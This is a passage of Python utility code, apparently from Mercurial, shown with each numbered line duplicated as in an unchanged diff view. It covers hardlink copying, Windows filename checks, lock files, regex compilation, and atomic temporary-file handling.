1173 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1173 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1174 num += n
1174 num += n
1175 else:
1175 else:
1176 if hardlink is None:
1176 if hardlink is None:
1177 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1177 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1178 os.stat(os.path.dirname(dst)).st_dev)
1178 os.stat(os.path.dirname(dst)).st_dev)
1179 topic = gettopic()
1179 topic = gettopic()
1180
1180
1181 if hardlink:
1181 if hardlink:
1182 try:
1182 try:
1183 oslink(src, dst)
1183 oslink(src, dst)
1184 except (IOError, OSError):
1184 except (IOError, OSError):
1185 hardlink = False
1185 hardlink = False
1186 shutil.copy(src, dst)
1186 shutil.copy(src, dst)
1187 else:
1187 else:
1188 shutil.copy(src, dst)
1188 shutil.copy(src, dst)
1189 num += 1
1189 num += 1
1190 progress(topic, num)
1190 progress(topic, num)
1191 progress(topic, None)
1191 progress(topic, None)
1192
1192
1193 return hardlink, num
1193 return hardlink, num
1194
1194
1195 _winreservednames = '''con prn aux nul
1195 _winreservednames = '''con prn aux nul
1196 com1 com2 com3 com4 com5 com6 com7 com8 com9
1196 com1 com2 com3 com4 com5 com6 com7 com8 com9
1197 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1197 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1198 _winreservedchars = ':*?"<>|'
1198 _winreservedchars = ':*?"<>|'
1199 def checkwinfilename(path):
1199 def checkwinfilename(path):
1200 r'''Check that the base-relative path is a valid filename on Windows.
1200 r'''Check that the base-relative path is a valid filename on Windows.
1201 Returns None if the path is ok, or a UI string describing the problem.
1201 Returns None if the path is ok, or a UI string describing the problem.
1202
1202
1203 >>> checkwinfilename("just/a/normal/path")
1203 >>> checkwinfilename("just/a/normal/path")
1204 >>> checkwinfilename("foo/bar/con.xml")
1204 >>> checkwinfilename("foo/bar/con.xml")
1205 "filename contains 'con', which is reserved on Windows"
1205 "filename contains 'con', which is reserved on Windows"
1206 >>> checkwinfilename("foo/con.xml/bar")
1206 >>> checkwinfilename("foo/con.xml/bar")
1207 "filename contains 'con', which is reserved on Windows"
1207 "filename contains 'con', which is reserved on Windows"
1208 >>> checkwinfilename("foo/bar/xml.con")
1208 >>> checkwinfilename("foo/bar/xml.con")
1209 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1209 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1210 "filename contains 'AUX', which is reserved on Windows"
1210 "filename contains 'AUX', which is reserved on Windows"
1211 >>> checkwinfilename("foo/bar/bla:.txt")
1211 >>> checkwinfilename("foo/bar/bla:.txt")
1212 "filename contains ':', which is reserved on Windows"
1212 "filename contains ':', which is reserved on Windows"
1213 >>> checkwinfilename("foo/bar/b\07la.txt")
1213 >>> checkwinfilename("foo/bar/b\07la.txt")
1214 "filename contains '\\x07', which is invalid on Windows"
1214 "filename contains '\\x07', which is invalid on Windows"
1215 >>> checkwinfilename("foo/bar/bla ")
1215 >>> checkwinfilename("foo/bar/bla ")
1216 "filename ends with ' ', which is not allowed on Windows"
1216 "filename ends with ' ', which is not allowed on Windows"
1217 >>> checkwinfilename("../bar")
1217 >>> checkwinfilename("../bar")
1218 >>> checkwinfilename("foo\\")
1218 >>> checkwinfilename("foo\\")
1219 "filename ends with '\\', which is invalid on Windows"
1219 "filename ends with '\\', which is invalid on Windows"
1220 >>> checkwinfilename("foo\\/bar")
1220 >>> checkwinfilename("foo\\/bar")
1221 "directory name ends with '\\', which is invalid on Windows"
1221 "directory name ends with '\\', which is invalid on Windows"
1222 '''
1222 '''
1223 if path.endswith('\\'):
1223 if path.endswith('\\'):
1224 return _("filename ends with '\\', which is invalid on Windows")
1224 return _("filename ends with '\\', which is invalid on Windows")
1225 if '\\/' in path:
1225 if '\\/' in path:
1226 return _("directory name ends with '\\', which is invalid on Windows")
1226 return _("directory name ends with '\\', which is invalid on Windows")
1227 for n in path.replace('\\', '/').split('/'):
1227 for n in path.replace('\\', '/').split('/'):
1228 if not n:
1228 if not n:
1229 continue
1229 continue
1230 for c in _filenamebytestr(n):
1230 for c in _filenamebytestr(n):
1231 if c in _winreservedchars:
1231 if c in _winreservedchars:
1232 return _("filename contains '%s', which is reserved "
1232 return _("filename contains '%s', which is reserved "
1233 "on Windows") % c
1233 "on Windows") % c
1234 if ord(c) <= 31:
1234 if ord(c) <= 31:
1235 return _("filename contains %r, which is invalid "
1235 return _("filename contains %r, which is invalid "
1236 "on Windows") % c
1236 "on Windows") % c
1237 base = n.split('.')[0]
1237 base = n.split('.')[0]
1238 if base and base.lower() in _winreservednames:
1238 if base and base.lower() in _winreservednames:
1239 return _("filename contains '%s', which is reserved "
1239 return _("filename contains '%s', which is reserved "
1240 "on Windows") % base
1240 "on Windows") % base
1241 t = n[-1]
1241 t = n[-1]
1242 if t in '. ' and n not in '..':
1242 if t in '. ' and n not in '..':
1243 return _("filename ends with '%s', which is not allowed "
1243 return _("filename ends with '%s', which is not allowed "
1244 "on Windows") % t
1244 "on Windows") % t
1245
1245
1246 if pycompat.osname == 'nt':
1246 if pycompat.osname == 'nt':
1247 checkosfilename = checkwinfilename
1247 checkosfilename = checkwinfilename
1248 timer = time.clock
1248 timer = time.clock
1249 else:
1249 else:
1250 checkosfilename = platform.checkosfilename
1250 checkosfilename = platform.checkosfilename
1251 timer = time.time
1251 timer = time.time
1252
1252
1253 if safehasattr(time, "perf_counter"):
1253 if safehasattr(time, "perf_counter"):
1254 timer = time.perf_counter
1254 timer = time.perf_counter
1255
1255
1256 def makelock(info, pathname):
1256 def makelock(info, pathname):
1257 try:
1257 try:
1258 return os.symlink(info, pathname)
1258 return os.symlink(info, pathname)
1259 except OSError as why:
1259 except OSError as why:
1260 if why.errno == errno.EEXIST:
1260 if why.errno == errno.EEXIST:
1261 raise
1261 raise
1262 except AttributeError: # no symlink in os
1262 except AttributeError: # no symlink in os
1263 pass
1263 pass
1264
1264
1265 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1265 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1266 os.write(ld, info)
1266 os.write(ld, info)
1267 os.close(ld)
1267 os.close(ld)
1268
1268
1269 def readlock(pathname):
1269 def readlock(pathname):
1270 try:
1270 try:
1271 return os.readlink(pathname)
1271 return os.readlink(pathname)
1272 except OSError as why:
1272 except OSError as why:
1273 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1273 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1274 raise
1274 raise
1275 except AttributeError: # no symlink in os
1275 except AttributeError: # no symlink in os
1276 pass
1276 pass
1277 fp = posixfile(pathname)
1277 fp = posixfile(pathname)
1278 r = fp.read()
1278 r = fp.read()
1279 fp.close()
1279 fp.close()
1280 return r
1280 return r
1281
1281
1282 def fstat(fp):
1282 def fstat(fp):
1283 '''stat file object that may not have fileno method.'''
1283 '''stat file object that may not have fileno method.'''
1284 try:
1284 try:
1285 return os.fstat(fp.fileno())
1285 return os.fstat(fp.fileno())
1286 except AttributeError:
1286 except AttributeError:
1287 return os.stat(fp.name)
1287 return os.stat(fp.name)
1288
1288
1289 # File system features
1289 # File system features
1290
1290
1291 def fscasesensitive(path):
1291 def fscasesensitive(path):
1292 """
1292 """
1293 Return true if the given path is on a case-sensitive filesystem
1293 Return true if the given path is on a case-sensitive filesystem
1294
1294
1295 Requires a path (like /foo/.hg) ending with a foldable final
1295 Requires a path (like /foo/.hg) ending with a foldable final
1296 directory component.
1296 directory component.
1297 """
1297 """
1298 s1 = os.lstat(path)
1298 s1 = os.lstat(path)
1299 d, b = os.path.split(path)
1299 d, b = os.path.split(path)
1300 b2 = b.upper()
1300 b2 = b.upper()
1301 if b == b2:
1301 if b == b2:
1302 b2 = b.lower()
1302 b2 = b.lower()
1303 if b == b2:
1303 if b == b2:
1304 return True # no evidence against case sensitivity
1304 return True # no evidence against case sensitivity
1305 p2 = os.path.join(d, b2)
1305 p2 = os.path.join(d, b2)
1306 try:
1306 try:
1307 s2 = os.lstat(p2)
1307 s2 = os.lstat(p2)
1308 if s2 == s1:
1308 if s2 == s1:
1309 return False
1309 return False
1310 return True
1310 return True
1311 except OSError:
1311 except OSError:
1312 return True
1312 return True
1313
1313
1314 try:
1314 try:
1315 import re2
1315 import re2
1316 _re2 = None
1316 _re2 = None
1317 except ImportError:
1317 except ImportError:
1318 _re2 = False
1318 _re2 = False
1319
1319
1320 class _re(object):
1320 class _re(object):
1321 def _checkre2(self):
1321 def _checkre2(self):
1322 global _re2
1322 global _re2
1323 try:
1323 try:
1324 # check if match works, see issue3964
1324 # check if match works, see issue3964
1325 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1325 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1326 except ImportError:
1326 except ImportError:
1327 _re2 = False
1327 _re2 = False
1328
1328
1329 def compile(self, pat, flags=0):
1329 def compile(self, pat, flags=0):
1330 '''Compile a regular expression, using re2 if possible
1330 '''Compile a regular expression, using re2 if possible
1331
1331
1332 For best performance, use only re2-compatible regexp features. The
1332 For best performance, use only re2-compatible regexp features. The
1333 only flags from the re module that are re2-compatible are
1333 only flags from the re module that are re2-compatible are
1334 IGNORECASE and MULTILINE.'''
1334 IGNORECASE and MULTILINE.'''
1335 if _re2 is None:
1335 if _re2 is None:
1336 self._checkre2()
1336 self._checkre2()
1337 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1337 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1338 if flags & remod.IGNORECASE:
1338 if flags & remod.IGNORECASE:
1339 pat = '(?i)' + pat
1339 pat = '(?i)' + pat
1340 if flags & remod.MULTILINE:
1340 if flags & remod.MULTILINE:
1341 pat = '(?m)' + pat
1341 pat = '(?m)' + pat
1342 try:
1342 try:
1343 return re2.compile(pat)
1343 return re2.compile(pat)
1344 except re2.error:
1344 except re2.error:
1345 pass
1345 pass
1346 return remod.compile(pat, flags)
1346 return remod.compile(pat, flags)
1347
1347
1348 @propertycache
1348 @propertycache
1349 def escape(self):
1349 def escape(self):
1350 '''Return the version of escape corresponding to self.compile.
1350 '''Return the version of escape corresponding to self.compile.
1351
1351
1352 This is imperfect because whether re2 or re is used for a particular
1352 This is imperfect because whether re2 or re is used for a particular
1353 function depends on the flags, etc, but it's the best we can do.
1353 function depends on the flags, etc, but it's the best we can do.
1354 '''
1354 '''
1355 global _re2
1355 global _re2
1356 if _re2 is None:
1356 if _re2 is None:
1357 self._checkre2()
1357 self._checkre2()
1358 if _re2:
1358 if _re2:
1359 return re2.escape
1359 return re2.escape
1360 else:
1360 else:
1361 return remod.escape
1361 return remod.escape
1362
1362
1363 re = _re()
1363 re = _re()
1364
1364
1365 _fspathcache = {}
1365 _fspathcache = {}
1366 def fspath(name, root):
1366 def fspath(name, root):
1367 '''Get name in the case stored in the filesystem
1367 '''Get name in the case stored in the filesystem
1368
1368
1369 The name should be relative to root, and be normcase-ed for efficiency.
1369 The name should be relative to root, and be normcase-ed for efficiency.
1370
1370
1371 Note that this function is unnecessary, and should not be
1371 Note that this function is unnecessary, and should not be
1372 called, for case-sensitive filesystems (simply because it's expensive).
1372 called, for case-sensitive filesystems (simply because it's expensive).
1373
1373
1374 The root should be normcase-ed, too.
1374 The root should be normcase-ed, too.
1375 '''
1375 '''
1376 def _makefspathcacheentry(dir):
1376 def _makefspathcacheentry(dir):
1377 return dict((normcase(n), n) for n in os.listdir(dir))
1377 return dict((normcase(n), n) for n in os.listdir(dir))
1378
1378
1379 seps = pycompat.ossep
1379 seps = pycompat.ossep
1380 if pycompat.osaltsep:
1380 if pycompat.osaltsep:
1381 seps = seps + pycompat.osaltsep
1381 seps = seps + pycompat.osaltsep
1382 # Protect backslashes. This gets silly very quickly.
1382 # Protect backslashes. This gets silly very quickly.
1383 seps.replace('\\','\\\\')
1383 seps.replace('\\','\\\\')
1384 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1384 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1385 dir = os.path.normpath(root)
1385 dir = os.path.normpath(root)
1386 result = []
1386 result = []
1387 for part, sep in pattern.findall(name):
1387 for part, sep in pattern.findall(name):
1388 if sep:
1388 if sep:
1389 result.append(sep)
1389 result.append(sep)
1390 continue
1390 continue
1391
1391
1392 if dir not in _fspathcache:
1392 if dir not in _fspathcache:
1393 _fspathcache[dir] = _makefspathcacheentry(dir)
1393 _fspathcache[dir] = _makefspathcacheentry(dir)
1394 contents = _fspathcache[dir]
1394 contents = _fspathcache[dir]
1395
1395
1396 found = contents.get(part)
1396 found = contents.get(part)
1397 if not found:
1397 if not found:
1398 # retry "once per directory" per "dirstate.walk" which
1398 # retry "once per directory" per "dirstate.walk" which
1399 # may take place for each patches of "hg qpush", for example
1399 # may take place for each patches of "hg qpush", for example
1400 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1400 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1401 found = contents.get(part)
1401 found = contents.get(part)
1402
1402
1403 result.append(found or part)
1403 result.append(found or part)
1404 dir = os.path.join(dir, part)
1404 dir = os.path.join(dir, part)
1405
1405
1406 return ''.join(result)
1406 return ''.join(result)
1407
1407
1408 def getfstype(dirpath):
1408 def getfstype(dirpath):
1409 '''Get the filesystem type name from a directory (best-effort)
1409 '''Get the filesystem type name from a directory (best-effort)
1410
1410
1411 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1411 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1412 '''
1412 '''
1413 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1413 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1414
1414
1415 def checknlink(testfile):
1415 def checknlink(testfile):
1416 '''check whether hardlink count reporting works properly'''
1416 '''check whether hardlink count reporting works properly'''
1417
1417
1418 # testfile may be open, so we need a separate file for checking to
1418 # testfile may be open, so we need a separate file for checking to
1419 # work around issue2543 (or testfile may get lost on Samba shares)
1419 # work around issue2543 (or testfile may get lost on Samba shares)
1420 f1 = testfile + ".hgtmp1"
1420 f1 = testfile + ".hgtmp1"
1421 if os.path.lexists(f1):
1421 if os.path.lexists(f1):
1422 return False
1422 return False
1423 try:
1423 try:
1424 posixfile(f1, 'w').close()
1424 posixfile(f1, 'w').close()
1425 except IOError:
1425 except IOError:
1426 try:
1426 try:
1427 os.unlink(f1)
1427 os.unlink(f1)
1428 except OSError:
1428 except OSError:
1429 pass
1429 pass
1430 return False
1430 return False
1431
1431
1432 f2 = testfile + ".hgtmp2"
1432 f2 = testfile + ".hgtmp2"
1433 fd = None
1433 fd = None
1434 try:
1434 try:
1435 oslink(f1, f2)
1435 oslink(f1, f2)
1436 # nlinks() may behave differently for files on Windows shares if
1436 # nlinks() may behave differently for files on Windows shares if
1437 # the file is open.
1437 # the file is open.
1438 fd = posixfile(f2)
1438 fd = posixfile(f2)
1439 return nlinks(f2) > 1
1439 return nlinks(f2) > 1
1440 except OSError:
1440 except OSError:
1441 return False
1441 return False
1442 finally:
1442 finally:
1443 if fd is not None:
1443 if fd is not None:
1444 fd.close()
1444 fd.close()
1445 for f in (f1, f2):
1445 for f in (f1, f2):
1446 try:
1446 try:
1447 os.unlink(f)
1447 os.unlink(f)
1448 except OSError:
1448 except OSError:
1449 pass
1449 pass
1450
1450
1451 def endswithsep(path):
1451 def endswithsep(path):
1452 '''Check path ends with os.sep or os.altsep.'''
1452 '''Check path ends with os.sep or os.altsep.'''
1453 return (path.endswith(pycompat.ossep)
1453 return (path.endswith(pycompat.ossep)
1454 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1454 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1455
1455
1456 def splitpath(path):
1456 def splitpath(path):
1457 '''Split path by os.sep.
1457 '''Split path by os.sep.
1458 Note that this function does not use os.altsep because this is
1458 Note that this function does not use os.altsep because this is
1459 an alternative of simple "xxx.split(os.sep)".
1459 an alternative of simple "xxx.split(os.sep)".
1460 It is recommended to use os.path.normpath() before using this
1460 It is recommended to use os.path.normpath() before using this
1461 function if need.'''
1461 function if need.'''
1462 return path.split(pycompat.ossep)
1462 return path.split(pycompat.ossep)
1463
1463
1464 def gui():
1464 def gui():
1465 '''Are we running in a GUI?'''
1465 '''Are we running in a GUI?'''
1466 if pycompat.sysplatform == 'darwin':
1466 if pycompat.sysplatform == 'darwin':
1467 if 'SSH_CONNECTION' in encoding.environ:
1467 if 'SSH_CONNECTION' in encoding.environ:
1468 # handle SSH access to a box where the user is logged in
1468 # handle SSH access to a box where the user is logged in
1469 return False
1469 return False
1470 elif getattr(osutil, 'isgui', None):
1470 elif getattr(osutil, 'isgui', None):
1471 # check if a CoreGraphics session is available
1471 # check if a CoreGraphics session is available
1472 return osutil.isgui()
1472 return osutil.isgui()
1473 else:
1473 else:
1474 # pure build; use a safe default
1474 # pure build; use a safe default
1475 return True
1475 return True
1476 else:
1476 else:
1477 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1477 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1478
1478
1479 def mktempcopy(name, emptyok=False, createmode=None):
1479 def mktempcopy(name, emptyok=False, createmode=None):
1480 """Create a temporary file with the same contents from name
1480 """Create a temporary file with the same contents from name
1481
1481
1482 The permission bits are copied from the original file.
1482 The permission bits are copied from the original file.
1483
1483
1484 If the temporary file is going to be truncated immediately, you
1484 If the temporary file is going to be truncated immediately, you
1485 can use emptyok=True as an optimization.
1485 can use emptyok=True as an optimization.
1486
1486
1487 Returns the name of the temporary file.
1487 Returns the name of the temporary file.
1488 """
1488 """
1489 d, fn = os.path.split(name)
1489 d, fn = os.path.split(name)
1490 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1490 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1491 os.close(fd)
1491 os.close(fd)
1492 # Temporary files are created with mode 0600, which is usually not
1492 # Temporary files are created with mode 0600, which is usually not
1493 # what we want. If the original file already exists, just copy
1493 # what we want. If the original file already exists, just copy
1494 # its mode. Otherwise, manually obey umask.
1494 # its mode. Otherwise, manually obey umask.
1495 copymode(name, temp, createmode)
1495 copymode(name, temp, createmode)
1496 if emptyok:
1496 if emptyok:
1497 return temp
1497 return temp
1498 try:
1498 try:
1499 try:
1499 try:
1500 ifp = posixfile(name, "rb")
1500 ifp = posixfile(name, "rb")
1501 except IOError as inst:
1501 except IOError as inst:
1502 if inst.errno == errno.ENOENT:
1502 if inst.errno == errno.ENOENT:
1503 return temp
1503 return temp
1504 if not getattr(inst, 'filename', None):
1504 if not getattr(inst, 'filename', None):
1505 inst.filename = name
1505 inst.filename = name
1506 raise
1506 raise
1507 ofp = posixfile(temp, "wb")
1507 ofp = posixfile(temp, "wb")
1508 for chunk in filechunkiter(ifp):
1508 for chunk in filechunkiter(ifp):
1509 ofp.write(chunk)
1509 ofp.write(chunk)
1510 ifp.close()
1510 ifp.close()
1511 ofp.close()
1511 ofp.close()
1512 except: # re-raises
1512 except: # re-raises
1513 try: os.unlink(temp)
1513 try: os.unlink(temp)
1514 except OSError: pass
1514 except OSError: pass
1515 raise
1515 raise
1516 return temp
1516 return temp
1517
1517
1518 class filestat(object):
1518 class filestat(object):
1519 """help to exactly detect change of a file
1519 """help to exactly detect change of a file
1520
1520
1521 'stat' attribute is result of 'os.stat()' if specified 'path'
1521 'stat' attribute is result of 'os.stat()' if specified 'path'
1522 exists. Otherwise, it is None. This can avoid preparative
1522 exists. Otherwise, it is None. This can avoid preparative
1523 'exists()' examination on client side of this class.
1523 'exists()' examination on client side of this class.
1524 """
1524 """
1525 def __init__(self, path):
1525 def __init__(self, path):
1526 try:
1526 try:
1527 self.stat = os.stat(path)
1527 self.stat = os.stat(path)
1528 except OSError as err:
1528 except OSError as err:
1529 if err.errno != errno.ENOENT:
1529 if err.errno != errno.ENOENT:
1530 raise
1530 raise
1531 self.stat = None
1531 self.stat = None
1532
1532
1533 __hash__ = object.__hash__
1533 __hash__ = object.__hash__
1534
1534
1535 def __eq__(self, old):
1535 def __eq__(self, old):
1536 try:
1536 try:
1537 # if ambiguity between stat of new and old file is
1537 # if ambiguity between stat of new and old file is
1538 # avoided, comparison of size, ctime and mtime is enough
1538 # avoided, comparison of size, ctime and mtime is enough
1539 # to exactly detect change of a file regardless of platform
1539 # to exactly detect change of a file regardless of platform
1540 return (self.stat.st_size == old.stat.st_size and
1540 return (self.stat.st_size == old.stat.st_size and
1541 self.stat.st_ctime == old.stat.st_ctime and
1541 self.stat.st_ctime == old.stat.st_ctime and
1542 self.stat.st_mtime == old.stat.st_mtime)
1542 self.stat.st_mtime == old.stat.st_mtime)
1543 except AttributeError:
1543 except AttributeError:
1544 return False
1544 return False
1545
1545
1546 def isambig(self, old):
1546 def isambig(self, old):
1547 """Examine whether new (= self) stat is ambiguous against old one
1547 """Examine whether new (= self) stat is ambiguous against old one
1548
1548
1549 "S[N]" below means stat of a file at N-th change:
1549 "S[N]" below means stat of a file at N-th change:
1550
1550
1551 - S[n-1].ctime < S[n].ctime: can detect change of a file
1551 - S[n-1].ctime < S[n].ctime: can detect change of a file
1552 - S[n-1].ctime == S[n].ctime
1552 - S[n-1].ctime == S[n].ctime
1553 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1553 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1554 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1554 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1555 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1555 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1556 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1556 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1557
1557
1558 Case (*2) above means that a file was changed twice or more at
1558 Case (*2) above means that a file was changed twice or more at
1559 same time in sec (= S[n-1].ctime), and comparison of timestamp
1559 same time in sec (= S[n-1].ctime), and comparison of timestamp
1560 is ambiguous.
1560 is ambiguous.
1561
1561
1562 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1562 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1563 timestamp is ambiguous".
1563 timestamp is ambiguous".
1564
1564
1565 But advancing mtime only in case (*2) doesn't work as
1565 But advancing mtime only in case (*2) doesn't work as
1566 expected, because naturally advanced S[n].mtime in case (*1)
1566 expected, because naturally advanced S[n].mtime in case (*1)
1567 might be equal to manually advanced S[n-1 or earlier].mtime.
1567 might be equal to manually advanced S[n-1 or earlier].mtime.
1568
1568
1569 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1569 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1570 treated as ambiguous regardless of mtime, to avoid overlooking
1570 treated as ambiguous regardless of mtime, to avoid overlooking
1571 by confliction between such mtime.
1571 by confliction between such mtime.
1572
1572
1573 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1573 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1574 S[n].mtime", even if size of a file isn't changed.
1574 S[n].mtime", even if size of a file isn't changed.
1575 """
1575 """
1576 try:
1576 try:
1577 return (self.stat.st_ctime == old.stat.st_ctime)
1577 return (self.stat.st_ctime == old.stat.st_ctime)
1578 except AttributeError:
1578 except AttributeError:
1579 return False
1579 return False
1580
1580
1581 def avoidambig(self, path, old):
1581 def avoidambig(self, path, old):
1582 """Change file stat of specified path to avoid ambiguity
1582 """Change file stat of specified path to avoid ambiguity
1583
1583
1584 'old' should be previous filestat of 'path'.
1584 'old' should be previous filestat of 'path'.
1585
1585
1586 This skips avoiding ambiguity, if a process doesn't have
1586 This skips avoiding ambiguity, if a process doesn't have
1587 appropriate privileges for 'path'.
1587 appropriate privileges for 'path'.
1588 """
1588 """
1589 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1589 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1590 try:
1590 try:
1591 os.utime(path, (advanced, advanced))
1591 os.utime(path, (advanced, advanced))
1592 except OSError as inst:
1592 except OSError as inst:
1593 if inst.errno == errno.EPERM:
1593 if inst.errno == errno.EPERM:
1594 # utime() on the file created by another user causes EPERM,
1594 # utime() on the file created by another user causes EPERM,
1595 # if a process doesn't have appropriate privileges
1595 # if a process doesn't have appropriate privileges
1596 return
1596 return
1597 raise
1597 raise
1598
1598
1599 def __ne__(self, other):
1599 def __ne__(self, other):
1600 return not self == other
1600 return not self == other
1601
1601
1602 class atomictempfile(object):
1602 class atomictempfile(object):
1603 '''writable file object that atomically updates a file
1603 '''writable file object that atomically updates a file
1604
1604
1605 All writes will go to a temporary copy of the original file. Call
1605 All writes will go to a temporary copy of the original file. Call
1606 close() when you are done writing, and atomictempfile will rename
1606 close() when you are done writing, and atomictempfile will rename
1607 the temporary copy to the original name, making the changes
1607 the temporary copy to the original name, making the changes
1608 visible. If the object is destroyed without being closed, all your
1608 visible. If the object is destroyed without being closed, all your
1609 writes are discarded.
1609 writes are discarded.
1610
1610
1611 checkambig argument of constructor is used with filestat, and is
1611 checkambig argument of constructor is used with filestat, and is
1612 useful only if target file is guarded by any lock (e.g. repo.lock
1612 useful only if target file is guarded by any lock (e.g. repo.lock
1613 or repo.wlock).
1613 or repo.wlock).
1614 '''
1614 '''
1615 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1615 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1616 self.__name = name # permanent name
1616 self.__name = name # permanent name
1617 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1617 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1618 createmode=createmode)
1618 createmode=createmode)
1619 self._fp = posixfile(self._tempname, mode)
1619 self._fp = posixfile(self._tempname, mode)
1620 self._checkambig = checkambig
1620 self._checkambig = checkambig
1621
1621
1622 # delegated methods
1622 # delegated methods
1623 self.read = self._fp.read
1623 self.read = self._fp.read
1624 self.write = self._fp.write
1624 self.write = self._fp.write
1625 self.seek = self._fp.seek
1625 self.seek = self._fp.seek
1626 self.tell = self._fp.tell
1626 self.tell = self._fp.tell
1627 self.fileno = self._fp.fileno
1627 self.fileno = self._fp.fileno
1628
1628
1629 def close(self):
1629 def close(self):
1630 if not self._fp.closed:
1630 if not self._fp.closed:
1631 self._fp.close()
1631 self._fp.close()
1632 filename = localpath(self.__name)
1632 filename = localpath(self.__name)
1633 oldstat = self._checkambig and filestat(filename)
1633 oldstat = self._checkambig and filestat(filename)
1634 if oldstat and oldstat.stat:
1634 if oldstat and oldstat.stat:
1635 rename(self._tempname, filename)
1635 rename(self._tempname, filename)
1636 newstat = filestat(filename)
1636 newstat = filestat(filename)
1637 if newstat.isambig(oldstat):
1637 if newstat.isambig(oldstat):
1638 # stat of changed file is ambiguous to original one
1638 # stat of changed file is ambiguous to original one
1639 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1639 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1640 os.utime(filename, (advanced, advanced))
1640 os.utime(filename, (advanced, advanced))
1641 else:
1641 else:
1642 rename(self._tempname, filename)
1642 rename(self._tempname, filename)
1643
1643
1644 def discard(self):
1644 def discard(self):
1645 if not self._fp.closed:
1645 if not self._fp.closed:
1646 try:
1646 try:
1647 os.unlink(self._tempname)
1647 os.unlink(self._tempname)
1648 except OSError:
1648 except OSError:
1649 pass
1649 pass
1650 self._fp.close()
1650 self._fp.close()
1651
1651
1652 def __del__(self):
1652 def __del__(self):
1653 if safehasattr(self, '_fp'): # constructor actually did something
1653 if safehasattr(self, '_fp'): # constructor actually did something
1654 self.discard()
1654 self.discard()
1655
1655
1656 def __enter__(self):
1656 def __enter__(self):
1657 return self
1657 return self
1658
1658
1659 def __exit__(self, exctype, excvalue, traceback):
1659 def __exit__(self, exctype, excvalue, traceback):
1660 if exctype is not None:
1660 if exctype is not None:
1661 self.discard()
1661 self.discard()
1662 else:
1662 else:
1663 self.close()
1663 self.close()
1664
1664
1665 def unlinkpath(f, ignoremissing=False):
1665 def unlinkpath(f, ignoremissing=False):
1666 """unlink and remove the directory if it is empty"""
1666 """unlink and remove the directory if it is empty"""
1667 if ignoremissing:
1667 if ignoremissing:
1668 tryunlink(f)
1668 tryunlink(f)
1669 else:
1669 else:
1670 unlink(f)
1670 unlink(f)
1671 # try removing directories that might now be empty
1671 # try removing directories that might now be empty
1672 try:
1672 try:
1673 removedirs(os.path.dirname(f))
1673 removedirs(os.path.dirname(f))
1674 except OSError:
1674 except OSError:
1675 pass
1675 pass
1676
1676
1677 def tryunlink(f):
1677 def tryunlink(f):
1678 """Attempt to remove a file, ignoring ENOENT errors."""
1678 """Attempt to remove a file, ignoring ENOENT errors."""
1679 try:
1679 try:
1680 unlink(f)
1680 unlink(f)
1681 except OSError as e:
1681 except OSError as e:
1682 if e.errno != errno.ENOENT:
1682 if e.errno != errno.ENOENT:
1683 raise
1683 raise
1684
1684
1685 def makedirs(name, mode=None, notindexed=False):
1685 def makedirs(name, mode=None, notindexed=False):
1686 """recursive directory creation with parent mode inheritance
1686 """recursive directory creation with parent mode inheritance
1687
1687
1688 Newly created directories are marked as "not to be indexed by
1688 Newly created directories are marked as "not to be indexed by
1689 the content indexing service", if ``notindexed`` is specified
1689 the content indexing service", if ``notindexed`` is specified
1690 for "write" mode access.
1690 for "write" mode access.
1691 """
1691 """
1692 try:
1692 try:
1693 makedir(name, notindexed)
1693 makedir(name, notindexed)
1694 except OSError as err:
1694 except OSError as err:
